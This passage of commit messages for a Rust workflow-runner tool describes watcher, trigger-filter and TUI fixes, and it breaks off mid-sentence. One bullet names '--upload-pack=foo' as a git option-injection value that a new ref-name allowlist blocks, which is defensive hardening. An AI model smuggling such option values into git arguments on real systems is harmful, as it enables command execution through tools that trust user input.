  background threads by dropping the in-flight receiver first
- Add 15 new tests covering filter_workflows, should_ignore_path,
  debouncer livelock prevention, invalid globs, and parser types

* fix(watcher,wrkflw,ui): make watch concurrency configurable and warn on lone --event

Three small things from a code review that were bugging me.

First: the watcher had MAX_CONCURRENT_EXECUTIONS hardcoded to 4.
Fine for a typical .github/workflows directory, terrible for anyone
with 30 workflows who actually wants them to run. Promote it to
DEFAULT_MAX_CONCURRENT_EXECUTIONS, plumb a max_concurrency parameter
through WorkflowWatcher::new, and expose it as --max-concurrency on
the watch command. Clamp to >= 1 because passing 0 to
buffer_unordered would just deadlock, and "deadlock on user input"
is not the user experience I want to ship.

Second: `wrkflw run --event push` (without --diff or
--changed-files) silently builds an EventContext with zero changed
files. Any workflow with a `paths:` filter then "doesn't trigger"
and the user has no idea why. Log a warning explaining exactly what
happened and what to do about it. Not a fix per se — the behavior is
technically correct — but silent surprise is worse than a loud
warning.

While at it: add a comment on the `_watcher` binding in the watch
loop because RecommendedWatcher stops emitting events the moment it
gets dropped, and that's the kind of footgun future-me will
absolutely step on. Also flatten a pointless nested if/else in
status_bar.rs that clippy would have eventually complained about
anyway.

* fix(trigger-filter,watcher,ui): stop lying about which workflows would run

The diff-aware execution feature had a pile of quiet ways to
mislead the user, which is the worst kind of bug in a tool whose
entire purpose is "tell me what would run."

First, invalid glob patterns were silently swallowed. A typo
like `paths: [src/**.rs]` matched nothing and there was no
diagnostic — the workflow just reported "would not trigger" and
everyone assumed it was correct. Compile globs up front in
parse_trigger_config and surface bad patterns as ParseError
pointing at the exact key (e.g. `push.paths`). Pre-compiling
also means we're not re-running Pattern::new on every hot path.

Second, the \`pull_request: branches:\` filter was matched against
the current working branch. GitHub Actions matches it against
the *base* (target) branch, so any workflow guarded by
\`pull_request: branches: [main]\` was reported as "would not
trigger" when evaluated on a feature branch. That's the exact
opposite of what happens on GitHub. Add base_branch to
EventContext, route it through branch_for_filter(), expose a
--base-branch flag on both \`run\` and \`watch\`, and warn loudly
when the user simulates pull_request without it.

Third — and this is the fun one — the TUI's diff filter zipped
background-thread results *positionally* against self.workflows.
The background thread captured workflow_paths at toggle time
and sent back a Vec. If the workflow list reloaded between
toggle and result delivery (a new .yml appears on disk, which
is *exactly* what a file-watcher app does), the positional zip
assigned statuses to the wrong workflows. Send (PathBuf, status)
pairs through the channel and key them by path on receipt.

While at it:

- should_ignore_path matched any component anywhere in the path
  against the blacklist, so a file literally named
  \`scripts/target\` or \`docs/build\` was silently dropped.
  Repo-root-relative + skip-the-leaf fixes it.
- All git commands take an optional cwd and prepend
  \`git -C <root>\`, so the watcher queries the repo it's actually
  watching instead of whatever the process CWD happens to be.
- Ref names are validated against an allowlist before being
  passed to \`git diff\`, so \`--upload-pack=foo\` and friends can't
  sneak in through --diff-base.
- For non-HEAD base, the redundant \`git diff --cached <ref>\` was
  doing nothing useful — \`git diff <ref>\` already covers staged
  + unstaged. Dropped.
- Workflow files are cached in the watcher and only reparsed
  when they actually change. If all of them fail to parse, say
  so — before, the user just saw "0 triggered, 0 skipped" and
  wondered what they'd broken.
- Empty-tree SHA fallback is now a named constant and logs a
  warning when it's used. If you've fallen back to diffing
  against the empty tree, you almost certainly don't want to.
- The 200-line Run arm in main.rs is extracted into
  run_trigger_prefilter_or_exit().
- Dead TriggerFilterError::IoError variant removed.

Tests: 57 in trigger-filter (incl. PR base_branch semantics,
invalid-glob parse errors, ref validation), 13 in watcher
(incl. file-named-target cases), plus a regression test in the
TUI for the path-keyed mapping.

* fix(watcher,trigger-filter): stop dropping fs events and thrashing globs

A fresh code review turned up a handful of real issues in the
diff-aware execution path. A few of them were silent failure
modes, which is the worst kind.

The watcher had a 256-slot bounded MPSC with `try_send` sitting
between the notify callback and the debouncer. The comment said
dropping was fine "because the debouncer coalesces anyway" — which
is only true for repeat events on the *same* path. Burst 300
distinct file changes at it and ~44 unique paths just vanish, and
any workflow whose `paths:` filter matched exactly one of those
files fails to trigger. Which is the entire point of the feature.

Rip the channel out. The notify callback now pushes straight into
the debouncer's shared set — a hashset insert under a mutex,
bounded in cost, and it dedups for free. No intermediate buffer
to overflow.

It turns out `strip_prefix(&self.repo_root)` was also lying to us.
On macOS, `/var` gets delivered as `/private/var`; symlinked
worktrees have the same problem. Every event would fail the
prefix check, the relative path list ended up empty, and the loop
cheerfully `continue`d without telling anyone. Canonicalize the
repo root once at startup and canonicalize incoming paths before
stripping. Warn in verbose mode when events still don't resolve,
so there's a breadcrumb when it does go wrong.

While in there, the watcher was re-parsing every workflow's
trigger config *and recompiling every glob pattern* on every
cycle, because `filter_workflows` takes `WorkflowDefinition` and
parses on the spot. Add `filter_trigger_configs` taking pre-parsed
`WorkflowTriggerConfig`s, and have the watcher cache them by path,
invalidated only when the backing file actually shows up in
`changed_paths`. Free performance for anyone with more than three
workflow files.

And some smaller stuff the review turned up:

`auto_detect_context` and friends were running three git
subprocesses sequentially for absolutely no reason. `tokio::join!`
them. `validate_ref_name` was rejecting `HEAD@{1}`, `@~1`, and
`origin/main@{upstream}` — all perfectly legitimate git revision
syntax — so extend the allowlist to include `@`, `{`, `}`. The
TUI's diff-filter evaluator was hardcoding `event_name = "push"`;
thread it through as a parameter so future event selection is a
plumbing change, not a rewrite. And `run --diff` crashed with a
confusing "Error parsing workflow" message when pointed at a
directory — catch that up front and point the user at
`wrkflw watch` instead.

* fix(trigger-filter,watcher,ui): plug silent-failure holes and unblock reactor

The review on this branch turned up a handful of "the filter
quietly lies to you" bugs plus a watch loop that cheerfully
calls blocking syscalls from inside an async function. Let's
fix all of it.

First, the *actually* scary one: inline `!`-prefixed patterns
in `branches:`/`tags:`/`paths:` were compiled as literal globs.
The `glob` crate doesn't treat a leading `!` as negation, so
something like `branches: ['main', '!release/old']` would
compile `!release/old` into a pattern that matches the string
`!release/old` and *nothing else*. The exclusion got silently
dropped and the workflow happily triggered on `release/old`.
Route those into the `*_ignore` lists at parse time, support
the `!!literal` escape, and reject mixing inline `!` with a
dedicated `*-ignore` key (GHA itself rejects that). Four new
tests cover it.

Second silent lie: `get_default_diff_base` fell back to the
empty-tree SHA when no better base could be detected, which
made `git diff` list *every tracked file* as changed. The
"filter" then matched everything — the log warning was the
only hint. Make it return an error and let the CLI tell the
user to pass `--diff-base` explicitly. A filter that can't
tell you what it's filtering is worse than no filter.

While at it, wrap every git subprocess in a 10s
`tokio::time::timeout` so a hung git (network fs, credential
prompt, corrupt repo) can't wedge the watch loop forever. And
drop the redundant `git diff --cached HEAD` pass — plain
`git diff HEAD` already covers staged + unstaged + deleted.
It was doing nothing but spawning a second process.

Third problem was the watch loop itself. `collect_workflow_files`
ran `read_dir` synchronously *inside* the async run loop on
every cycle, and the per-cycle canonicalize pass called
`std::fs::canonicalize` on every changed path without ever
hopping onto a blocking thread. On a branch switch touching
thousands of files this stalls the reactor. Move both onto
`spawn_blocking`. Also rewrote `should_ignore_path` to walk
`rel.parent().components()` directly instead of collecting
into a `Vec<Component>` — it runs on every notify event, so
the allocation was genuinely wasteful.

The doc comment on `run()` claimed the callback "will not
stall the async watch loop" because it ran on `spawn_blocking`.
That's misleading — the loop awaits the spawned task, so the
*next* cycle doesn't start until the callback returns. Rewrote
it to describe the actual behavior (events accumulate in the
debouncer during the callback; keep it fast).

While I was in the UI crate, the diff-filter toggle was
spawning a raw OS thread and building a fresh
`current_thread` tokio runtime on it — inside a TUI that's
*already* running on a tokio runtime. This is the kind of
thing that looks fine until you try to debug it. Use
`tokio::task::spawn` on the ambient runtime and push the
workflow-parsing loop onto `spawn_blocking`. Same amount of
concurrency, none of the nested-runtime weirdness.

Also: the TUI hardcodes `push` as the simulated event but
never told the user. A workflow with `on: pull_request` would
show up as SKIPPED and the user had no idea why. Surface it
in the block title as `[DIFF: push]` and mention it in the
toggle log. Extracted to a `const` on `App` so a future event
selector is plumbing-only.

Minor cleanups: consistent `Error:` prefixes in the CLI
prefilter (was mixing "Warning: Failed" with `exit(1)` which
is just confusing), and dropped the now-unused
`wrkflw-logging` dep from `trigger-filter`.

All workspace tests pass, clippy is clean.

* fix(watcher,trigger-filter,ui): plug deleted-file + detached-HEAD holes and kill TUI foot-guns

A principal-engineer review of this branch turned up a pile of
correctness bugs and UX foot-guns that were all individually small
but collectively embarrassing. Let's fix them.

The nastiest one: when a file was deleted, `canonicalize` would fail
on the missing target, the fallback was the raw path from notify, and
on macOS (`/private/var` vs `/var`) or any symlinked working tree the
subsequent `strip_prefix(repo_root)` would drop the event on the
floor. So `rm src/main.rs` would *silently* fail to trigger any
workflow with `paths: [src/**]`. Which — in a tool whose entire point
is "run the workflows for what actually changed" — is not great.

Fixed by walking back to the nearest canonicalizable ancestor and
re-joining the missing tail. It's not pretty, but it's correct, and
it keeps deletions on the happy path.

While at it:

 - `should_ignore_path` used to iterate the *absolute* path
   components when `strip_prefix` failed, which means a perfectly
   innocent `/home/alice/target-acquisition/file.rs` would match the
   `target` ignore entry. Now we just refuse to filter anything that
   isn't under the watch root. Please don't have directories named
   after cargo internals outside your repo, but if you do, we won't
   punish you for it.

 - `get_current_branch` was returning the literal string `"HEAD"` in
   detached-HEAD state, because that's what `git rev-parse
   --abbrev-ref HEAD` prints. Any workflow with `branches: [HEAD]`
   would then "match" in detached state. Signature is now
   `Result<Option<String>, _>`, callers `.ok().flatten()`.

 - Notify events are now filtered by kind. Access, metadata, Any,
   Other are dropped; only Create, Remove, Modify::Data,
   Modify::Name make it to the debouncer. A `git checkout` firing a
   thousand rename events would previously blow through
   MAX_SETTLE_ROUNDS mid-burst. It still might, but at least we're
   not also counting every atime update.

 - The run() callback is now fire-and-forget. Previously the watch
   loop awaited `spawn_blocking(cb).await`, so a slow reporter (file
   sink, Slack webhook, whatever comes next) would stall the next
   cycle. Documented as "keep it fast" is not a real defense.

On the TUI side, the diff-filter key (`d`) had three separate
problems.

First, the event was a hardcoded `const DIFF_FILTER_EVENT = "push"`.
Users whose main workflow is `pull_request` would press `d`, see
every single workflow reported as SKIPPED, and file a bug. It's now
a field (`App::diff_filter_event`) so a future event selector is a
data-flow change and not a public API churn.

Second, rapid toggles leaked background tasks. Each press spawned a
fresh git + parse-every-workflow task and just dropped the previous
channel. Now we hold a `JoinHandle` and `abort()` the previous task
before starting a new one.

Third, when `auto_detect_context_default_base` errored (fresh repo,
no default branch, whatever), the UI silently showed every workflow
as None and the summary line said "0/N workflows would trigger" —
with *no* indication that anything had failed. The background task
now returns a `DiffFilterOutcome::{Success, Failure}` and the
failure reason gets pushed into the TUI log.

Also:

 - Status bar default hint lost `t trigger` when `d diff` was added.
   The `t` keybinding still worked, only discoverability was gone.
   Restored.

 - Workflows-tab title now reads the dynamic `diff_filter_event`
   field instead of the const.

Structural cleanup that was overdue anyway:

 - Introduced `WatcherConfig` builder. `WorkflowWatcher::new` already
   had eight parameters and a `#[allow(clippy::too_many_arguments)]`
   — the next knob was going to push it past ten. The old positional
   constructor is kept as a legacy forwarder so the CLI call site
   doesn't have to change in the same commit.

 - Split `WorkflowWatcher::run` into `refresh_trigger_cache` and
   `canonicalize_changed_paths` helpers. The loop was 190 lines of
   five concerns inline and completely untestable without spinning
   up a real notify watcher.

 - New `wrkflw_trigger_filter::load_trigger_config(path)` helper
   consolidates read + parse + compile globs. The watcher, the TUI
   diff evaluator, and the `run` CLI prefilter now all go through
   the same function, so they fail identically on the same broken
   file instead of each printing its own flavor of error.

 - `parser::resolve_include_and_ignore` replaces 40 lines of near-
   identical copy-paste across `branches`/`tags`/`paths`. Having
   the same bug in three places is not my idea of redundancy.

 - `wrkflw run` prefilter now roots git operations at the repo root
   via `find_repo_root()`, matching what the watcher already does.
   Consistent behavior when invoked from a subdirectory.

Tests: 12 new tests covering deleted-file canonicalization, event-
kind filtering, detached HEAD, diff-base error path, and the
failure-reporting path in the TUI. Tempfile-backed git tests for
`get_changed_files`, `get_default_diff_base`, and
`get_current_branch`. Regression test for the absolute-path leak in
`should_ignore_path`. 104 tests total across the three crates, all
green, clippy clean.

* fix(watcher,trigger-filter,ui,wrkflw): plug stale cache, silent parse failures, and reactor stalls

- watcher: refresh_trigger_cache compared raw notify paths (absolute,
  OS-canonicalized) against read_dir paths (relative), so the
  "this workflow file was edited, reparse it" branch was dead code and
  watch mode served stale parsed configs forever after the first edit.
  Canonicalize both sides into the same form before set membership.
- watcher: refresh_trigger_cache ran sync file I/O on the reactor.
  Move it onto a spawn_blocking thread via a new async wrapper; keep
  the sync helper as a free function so unit tests don't need a runtime.
- ui: evaluate_diff_filter dropped parse failures via .filter_map(.. .ok()),
  leaving users with N workflows showing as "-" and no signal that
  their YAML was broken. Capture failures into a new DiffFilterReport
  and surface each one in the log pane.
- ui: evaluate_diff_filter ran git helpers with cwd: None, so the TUI
  evaluated against whatever directory the user happened to be in
  rather than the discovered repo root. Plumb find_repo_root() through.
- trigger-filter: validate_ref_name accepted '..', git's range syntax,
  which slipped through into format!("{base}..{head}") interpolation
  and produced confusing three-dot errors. Reject it explicitly.
- trigger-filter: move find_repo_root from watcher into trigger-filter
  (the right home for our git shell-outs); watcher re-exports it for
  source compat.
- wrkflw,watcher: migrate the CLI off the legacy WorkflowWatcher::new
  positional ctor to the WatcherConfig builder, then delete the legacy
  ctor and the unused filter_workflows API.

* fix(trigger-filter,watcher,wrkflw): plug git zombie + watcher panic + silent filter holes

PR review on the diff-aware/watch branch turned up six issues that
either silently lie to the user or quietly degrade the watch loop
over time. None of them blow up immediately, which is precisely why
they're worth fixing before this lands.

It turns out the 10s `tokio::time::timeout` around every git
subprocess does *nothing* for the failure mode it was built for. A
hung child (NFS stall, credential prompt, corrupt repo) keeps
running after the timeout fires because `tokio::process::Command`
does not enable `kill_on_drop` by default — the future just gets
dropped and the zombie keeps consuming a process slot. On a long-
running watch session against a flaky mount that's exactly how you
end up with hundreds of zombie `git` processes. `kill_on_drop(true)`
on `git_cmd`. One line. Should have been there from the start.

The parser was happy to accept `paths:` + `paths-ignore:` (and the
branches/tags equivalents) on the same event. GitHub Actions rejects
that combination at upload time, so users could iterate locally
against semantics that would later fail in production. Same crate,
`extract_string_list` was silently dropping non-string list entries
via `filter_map(... .as_str())` — a typo like `paths: [{src: foo}]`
yielded an empty list, which then matched everything. The exact
"silently lying about which workflows would run" failure mode the
rest of this branch is built to prevent. Both now surface as
`ParseError` with the offending `event.key[idx]` location.

`auto_detect_context` collapsed a real `git rev-parse` failure to
`branch: None` via `.ok().flatten()`, which made a permission denied
on `.git/HEAD` look identical to a clean detached checkout. The
detached-HEAD path already returns `Ok(None)` from
`get_current_branch`, so the fix is just to drop the `.ok().flatten()`
and let `?` propagate real errors.

The watcher had two ways to silently brick itself. First, when
`context_from_changed_files` errored, it fell back to a context
with `branch: None` and kept going — every `branches:`-filtered
workflow then deterministically rejected for the rest of the session
while the user just saw "0 triggered" forever. Now the cycle short-
circuits, attaches the reason to a new `WatchEvent::error` field,
and the CLI surfaces it. Second, a panic from the executor would
unwind through `buffer_unordered` and kill the entire watch loop —
one rogue workflow takes down the session for everything. I wanted
to use \`tokio::spawn\` for isolation, but the executor's
\`dyn ContainerRuntime\` is not \`Sync\` so the future is not \`Send\`.
\`AssertUnwindSafe(...).catch_unwind()\` from \`futures\` works on the
local future, doesn't require \`Send\`, and gives us the same
"contain it, log it, keep going" behavior.

While at it: cache the canonical workflow path inside each trigger
cache entry so refresh stops re-canonicalizing every workflow on
every cycle (one \`lstat\` walk per file per cycle adds up on a
network mount); drop the no-op \`WorkflowWatcher\` accessor methods
that were pretending to be source-compat shims on a brand-new file;
and split the 130-line, 8-arg \`run_trigger_prefilter_or_exit\` in
main.rs into a \`PrefilterRequest\` struct + two helpers so the
\`#[allow(clippy::too_many_arguments)]\` can go away.

Tests cover all of it: parser combo-rejection (paths/branches/tags),
non-string entry rejection in both \`paths:\` and \`types:\`, the null-
is-empty negative case, canonical-path memoization across two
refresh cycles, and a structural test that
\`AssertUnwindSafe.catch_unwind\` actually classifies a panicking
future as \`Err\` so the watcher's match arm fires. Existing
\`parse_mapping_with_tags\` rewritten to use inline \`!\`-negation
because the old shape now violates the rule it asserts against.

\`cargo test --workspace\`: zero failures. clippy + fmt clean.

* fix(trigger-filter,watcher,ui): kill silent failures and dead code
 found in review

A principal-engineer-style review of the diff-aware-execution branch
turned up a small pile of paper cuts. None of them are catastrophic
on their own, but together they're the kind of "everything looks
fine, why is nothing triggering?" failure mode this entire feature
is supposed to *prevent*.

The main offender lives in `extract_glob_list`. It carried a
`compiled.source = display_src;` reassignment with a comment claiming
it preserved the human-visible source for the `!!` escape — except
`pattern_src` and `display_src` are equal in every branch, and
`GlobPattern::new` already wrote `pattern_src` into `compiled.source`
on the line above. So the assignment did nothing, and the comment
lied about it. Collapse the two variables into one `pattern_str`
and delete the dead write. While at it, document the greedy `!!`
behavior properly and pin the `!!!foo` triple-bang case with a
test, since GHA's spec doesn't cover it and we *will* refactor this
function again someday.

The TUI's `toggle_diff_filter` was calling `find_repo_root()`
synchronously on the UI thread. That's a `git rev-parse
--show-toplevel` subprocess. Microseconds on local disk, an
*actual hitch* on a network mount, every single toggle. Move it
into `spawn_blocking` inside the spawned task where it belongs.

`evaluate_and_execute` was also doing two pointless `git`
subprocess calls per cycle when there were zero parseable
workflows. Short-circuit on `configs.is_empty()` and stop paying
for context we'll never use.

While I was in there:

- `canonicalize_changed_paths` used to `filter_map(... .ok())`
  away any path it couldn't strip-prefix to the repo root.
  Notify *should* never deliver one of those, but if it does,
  silently dropping the event is exactly the failure mode this
  feature exists to kill. Log the dropped path under `--verbose`.

- `get_default_diff_base` only stripped the `origin/` prefix
  from `git symbolic-ref --short` output. If `--short` ever
  fails to apply (older git, weird vendor, who knows), the
  output is `refs/remotes/origin/main` and the candidate name
  ends up wrong. Strip both forms.

- `get_changed_files`'s doc claimed "covers staged + unstaged
  + committed-on-branch." That's *almost* true, but the
  modify-then-stage-then-revert-in-WT edge case is genuinely
  invisible to `git diff <base>`. Don't promise things we can't
  deliver — the trigger filter is an approximation, not a full
  index audit.

- `explain_filter_failure` now mentions an empty change set when
  a `paths:` filter rejects, so the user who passed `--event
  push` without `--diff` gets a directly actionable hint instead
  of a `paths: ["src/**"]` dump and a furrowed brow.

- `WorkflowWatcher::run` is an unbounded `loop {}` with no
  cancellation path. The CLI fakes graceful shutdown by calling
  `process::exit(0)` from a Ctrl+C handler. That works for the
  CLI, but anyone embedding this in a daemon or test harness is
  going to be unhappy. Document the limitation loudly so the
  next person knows it's a known follow-up rather than an
  oversight.

- The `JoinHandle::abort` in `toggle_diff_filter` doesn't
  actually cancel anything — abort only signals at await
  points, and the git futures inside the task may keep running.
  Soften the doc to "no longer observed" instead of overstating
  the guarantee.

None of this is glamorous. The bias of this entire branch has
been "fail loud, don't lie about what's running," and this just
finishes the cleanup the review surfaced.

Build clean, all 71 trigger-filter / 21 watcher / 19 ui tests
pass, no clippy warnings.

* fix(trigger-filter,watcher,ui,wrkflw): kill five more silent-failure holes from review

A principal-engineer review of the diff-aware/watch branch turned up
five places where this PR was still doing the exact thing the rest of
the branch was built to stop doing: failing quietly. Let's fix them.

`merge_unique` in trigger-filter built a `seen` set from `into` and
then never updated it inside the loop, so duplicates *within* `more`
itself happily slipped through. The function name is a contract — it
just wasn't being honored. Switch to `HashSet::insert`'s "was new"
return so each entry costs one lookup, not two, and add the obvious
regression test.

The watcher's notify callback was the next offender: a stray
`if let Ok(event) = res` swallowed every `notify::Error` — queue
overflow, inotify watch budget exhaustion, kernel disconnects, the
lot. The user gets a cheerful "watching..." banner while the loop is
effectively dead. Log the errors as warnings instead. While at it,
`canonicalize_changed_paths` was doing the same trick with
`unwrap_or_default` on its `JoinError`, mirroring nothing the
neighboring `refresh_trigger_cache_async` was doing. Made them
consistent.

The TUI diff filter had a more subtle one. `toggle_diff_filter`
aborts the previous in-flight evaluation on rapid toggles by dropping
the receiver, which makes the *next* `check_diff_filter_results`
tick see `Disconnected` — and unconditionally log "Diff filter:
evaluation failed". Telling the user their action failed when *they*
caused the disconnect is not great. Add a `diff_filter_aborted`
flag, arm it only when there was actually something to abort, and
clear it when consumed. Genuine task panics still get logged loudly.

And finally, `wrkflw run`'s prefilter was calling
`load_trigger_config` directly from an async fn, despite the
library's own docs saying "wrap in spawn_blocking or call from a
blocking context." The watcher and TUI both already do the right
thing here; the CLI was the odd one out. Drifting on this is
*exactly* how the silent-failure holes accumulated in the first
place, so move it onto the blocking pool.

Tests added for each: merge_unique dedup-within-more, the abort-flag
arming and consumption, and a "real disconnect still gets logged"
companion. trigger-filter 73/73, watcher 21/21, ui 21/21,
wrkflw 3/3, clippy clean.

* fix(trigger-filter,watcher,ui,wrkflw): plug another round of silent-failure holes from review

Another review pass on the diff-aware/watch feature, another batch
of "this thing was lying to the user." Same theme as the previous
five rounds, but the failure modes here are louder and harder to
recover from once they bite, so they go in their own commit.

The TUI's `diff_filter_aborted` flag was a footgun. It got armed
when a toggle aborted an in-flight evaluation, but on the OFF path
the next tick observed `rx is None`, returned early, and never
cleared the flag. The *next* toggle ON spawned a fresh task with a
fresh receiver — and inherited the stale flag. So if that fresh
task genuinely failed, the resulting `Disconnected` was treated as
a self-inflicted abort and silently swallowed. Exactly the failure
mode this whole feature has been built to prevent. Clear the flag
at the start of every new evaluation and pin it with a regression
test that drives the full ON → OFF → tick → ON → fail sequence.

The watcher's `is_relevant_event_kind` had a catch-all `Modify(_)
=> false` that dropped `Modify(Any)` events. It turns out kqueue
(FreeBSD, some macOS configurations) and notify's `PollWatcher`
fallback emit `Modify(Any)` for content changes when the underlying
API can't distinguish data from metadata. So the watcher worked
beautifully on Linux inotify and macOS FSEvents and was *completely
silent* on the other backends. Make the match exhaustive on
`ModifyKind` (no catch-all) so future enum additions surface as a
compile error instead of getting routed to "drop", and treat
`Modify(Any)` as relevant.

The watcher's repo-root canonicalization fallback was the worst of
the three. When `canonicalize` failed, the previous code logged a
warning and continued with the raw path. On macOS that means every
notify event arrives as `/private/var/...`, every `strip_prefix`
against the non-canonical `/var/...` rejects, and the user sees
"Watching..." forever with zero workflows ever firing. A watcher
that *looks* alive but never matches a single event is the absolute
worst possible failure mode for this feature. Make it fatal at
startup. If you can't canonicalize the repo root, you don't get a
watcher.

While at it: stamp `--activity-type` through all three integration
points so workflows with `pull_request: { types: [...] }` filters
actually work in the TUI, the watcher, AND the CLI prefilter
(previously only the CLI bothered, and even then only after the
last round of fixes); make `--diff-base` optional on the run
command so the smart auto-detect (origin/HEAD → main → master →
HEAD~1) is actually reachable instead of being shadowed by a
`default_value = "HEAD"` that silently restricted every `--diff`
invocation to uncommitted-only changes; add an info log when
`get_default_diff_base` falls back to HEAD because the working
tree is dirty, since "I have WIP edits, why is `--diff` reporting
nothing triggered?" was a guaranteed support question; extract
`load_trigger_configs` into the trigger-filter crate so the TUI
and watcher stop maintaining near-duplicate parse-and-partition
loops; tighten the activity-type diagnostic to point at the actual
CLI flag instead of a tautology ("requires one"); warn loudly when
a workflow panics inside the watch loop's `catch_unwind` that the
executor may have left containers, tempdirs, or child processes
uncleaned, because a silent panic-recovery on a long-running watch
session is how you end up with `docker ps -a` looking like a
graveyard; and tune `MAX_SETTLE_ROUNDS` from 10 down to 3 so a
sustained `cargo build` can't delay a debounce drain by 5s while
the user wonders if the watcher hung.

Tests cover all three high-priority bugs explicitly. The
aborted-flag test in particular drives the *exact* sequence the
old code got wrong, because the only thing more embarrassing than
a silent-failure hole in a "no more silent failures" feature is
shipping the same failure mode again three weeks later.

* fix(trigger-filter,watcher): plug three silent-failure holes

Review pass turned up three more places where the trigger filter and
watcher would quietly do the wrong thing instead of telling the user
what was going on. Let's fix that.

First: `parse_events` for the `on: [push, pull_request]` sequence
form was silently dropping non-string entries. A typo like
`on: [push, {pull_request: {branches: [main]}}]` collapsed to
`on: [push]` and the pull_request filter *never applied*. The rest
of the parser has been rejecting this kind of nonsense via
`extract_string_list` for a while — the sequence path just never
got the memo. Now it errors with the offending index and kind, same
as everywhere else.

Second: `explain_filter_failure` was building its branch-mismatch
diagnostic from `filter.branches` only, completely ignoring
`branches_ignore`. A workflow with ONLY `branches-ignore: [main]`
running on `main` rendered as `branch 'main' did not match []` —
factually correct, totally useless. Combine both lists with
`!`-prefixed ignore entries so the diagnostic round-trips to the
surface syntax the user actually wrote. Same treatment for tags,
which had the identical bug.

Third: the watcher's per-cycle `collect_workflow_files` rescan was
swallowing errors with `if let Ok(refreshed) = ...` and silently
reusing the previous snapshot forever. Not wrong — the watch loop
*must* continue on transient failures — but silently falling back
to a stale list with zero diagnostic is exactly the silent-skip
pattern the rest of this PR has been plugging. Log at debug level
so a `--verbose` run leaves a trail.

Regression tests for all three. `cargo test` on the two touched
crates: 101 passed, 0 failed.

* fix(trigger-filter,watcher,wrkflw,ui): plug GHA divergence and CLI foot-guns from review

It turns out the path matcher had a "helpful" fallback that tried the
bare filename when a pattern had no slash in it. Neat trick, except
it's not what GitHub Actions does. `*.rs` would match `src/main.rs`
locally and then silently fail to match the same file on GHA, which
is the single worst outcome for a trigger filter whose entire job is
predicting what the real runner will do. Rip it out. Users who want
"any .rs file anywhere" write `**/*.rs` — that's the GHA idiom and
always has been. Pin the new behavior with a test so nobody resurrects
the fallback during a well-meaning refactor.

While at it, a few CLI foot-guns the same review turned up.

`find_repo_root()` shells out to `git rev-parse --show-toplevel`
synchronously and is *not* covered by `GIT_COMMAND_TIMEOUT` — so a
hung git (credential prompt, stuck NFS mount, corrupt repo) would
cheerfully freeze the tokio reactor on `wrkflw run --diff` and
`wrkflw watch`. The TUI already wrapped this call in `spawn_blocking`;
the CLI just didn't. Fix both call sites.

`wrkflw run --diff .gitlab-ci.yml` ran the GitHub-only trigger
prefilter first and then dumped a confusing "Error parsing workflow"
from deep in the YAML parser. Detect GitLab before the prefilter and
bail out with a message that actually tells the user what went wrong.

`max_concurrency` had a floor of 1 but no ceiling, so
\`--max-concurrency 1000000\` was happily accepted. Each concurrent
workflow carries executor state — containers, tempdirs, child
processes — so unbounded values trivially OOM the host with no
helpful signal. Clamp to 256 and warn loudly on the way down.

The watch loop fire-and-forgets the reporter callback via
\`spawn_blocking\` and then drops the JoinHandle. A panicking callback
vanished into tokio's default panic reporter with zero watch-loop
signal, which is exactly the silent-failure mode this whole PR has
been plugging. Supervisor task now awaits the handle and logs any
panic payload via \`wrkflw_logging::error\`. Not great that the
reporter type still invites \`Fn(WatchEvent)\` directly, but at least
a broken reporter is loud now.

Also: the TUI diff-filter toggle used to pay for two git subprocess
calls even when the workflow list was empty — mirror the watcher's
\`configs.is_empty()\` short-circuit so an empty toggle is free. And
dedup the branches/tags formatting in \`explain_filter_failure\`
behind a \`combined_pattern_sources\` helper so a future diagnostic
tweak can't make the two arms drift apart again.

* fix(trigger-filter,watcher): stop git from stealing TTY and fix symlink ignore hole

Another pass over the PR turned up two ugly ones plus a handful of
smaller silent-failure holes that had been sitting there in plain
sight. Let's deal with all of them at once.

The headline issue: every git subprocess we spawn inherited stdin
from the parent TTY and had no `GIT_TERMINAL_PROMPT=0`. In the TUI,
which runs in raw-terminal mode, that means a backgrounded `git diff`
from the diff-filter toggle will happily consume the user's
keystrokes for the full `GIT_COMMAND_TIMEOUT` window (up to 10
seconds) while ratatui sits there wondering where its input went. On
any repo whose remote wants auth it's even worse — git's askpass
races the UI for every keypress. *This is not great.* Wire
`Stdio::null()` and `GIT_TERMINAL_PROMPT=0` into `git_cmd` so every
subprocess is fully insulated from the parent terminal, and do the
same in `find_repo_root` while we're in there.

The other ugly one: `should_ignore_path` compared events against
`repo_root_canonical` only. That happens to work on macOS because
FSEvents canonicalizes everything, but on Linux with a symlinked
working tree (`/home/alice/proj` pointing at `/mnt/work/proj`),
inotify delivers events rooted at the raw `.watch()` argument, so
`strip_prefix` against the canonical form fails for *every single
event* and the entire ignore filter goes silently dark. You end up
eating every `target/`, `node_modules/` and `.git/` write through the
debouncer. Pass both the raw and canonical forms and try each in
turn — the two regression tests pin both the Linux-symlink and the
macOS `/private/var` paths.

While at it:

- `find_repo_root` had no timeout at all. A hung git there leaks a
  blocking-pool thread for the rest of the process's life. Replaced
  with a hand-rolled `try_wait` poll + kill-on-deadline so we don't
  need tokio in this sync path.
- `get_default_diff_base` trusted `git status` stdout without
  checking `status.success()`. On a corrupted repo it would cheerfully
  claim a clean tree and fall through. Check the exit code like every
  other call site does.
- `parse_event_config` silently accepted non-mapping event values, so
  \`on: { push: "main" }\` collapsed to "push with no filters" instead
  of surfacing the typo. The one remaining silent-drop hole in a
  parser that's otherwise militant about these — fixed, with a
  regression test.
- `with_max_concurrency(0)` silently clamped to 1 without the warning
  its upper-bound sibling emits. Symmetric now.
- Dropped a stale doc comment on `GlobPattern` that still advertised
  the bare-filename fallback `path_matcher` explicitly deleted.

All 79 trigger-filter tests and all 25 watcher tests pass, including
the four new regressions (two symlink cases, the parser typo, and the
ignore-file raw/canonical asymmetry).

* fix(trigger-filter,watcher,wrkflw): plug scalability and platform holes from review

Review flagged three issues that would bite real users the moment this
ships: inotify budget exhaustion on monorepos, a per-cycle git
subprocess storm, and Windows `paths:` filters silently never matching.
Plus a handful of smaller cuts.

**inotify pruning.** `watcher.watch(root, Recursive)` expands into one
inotify watch per directory in the tree, so the recursive-on-root call
was happily registering watches on every directory inside `target/`,
`node_modules/`, and `.git/`. On any serious Rust monorepo that blows
past `fs.inotify.max_user_watches = 8192` before the user edits a
single file, at which point notify fails half-open and the watcher
looks alive but never fires. New `setup_watches()` walks the root,
registers each non-ignored child subtree recursively, and leaves the
high-churn subtrees completely un-watched. The ignore filter on the
event hot path stays too, because macOS FSEvents can still deliver
paths the walker didn't register.

**Branch/tag cache.** Every debounced cycle was shelling out to
`git rev-parse --abbrev-ref HEAD` and `git describe --exact-match
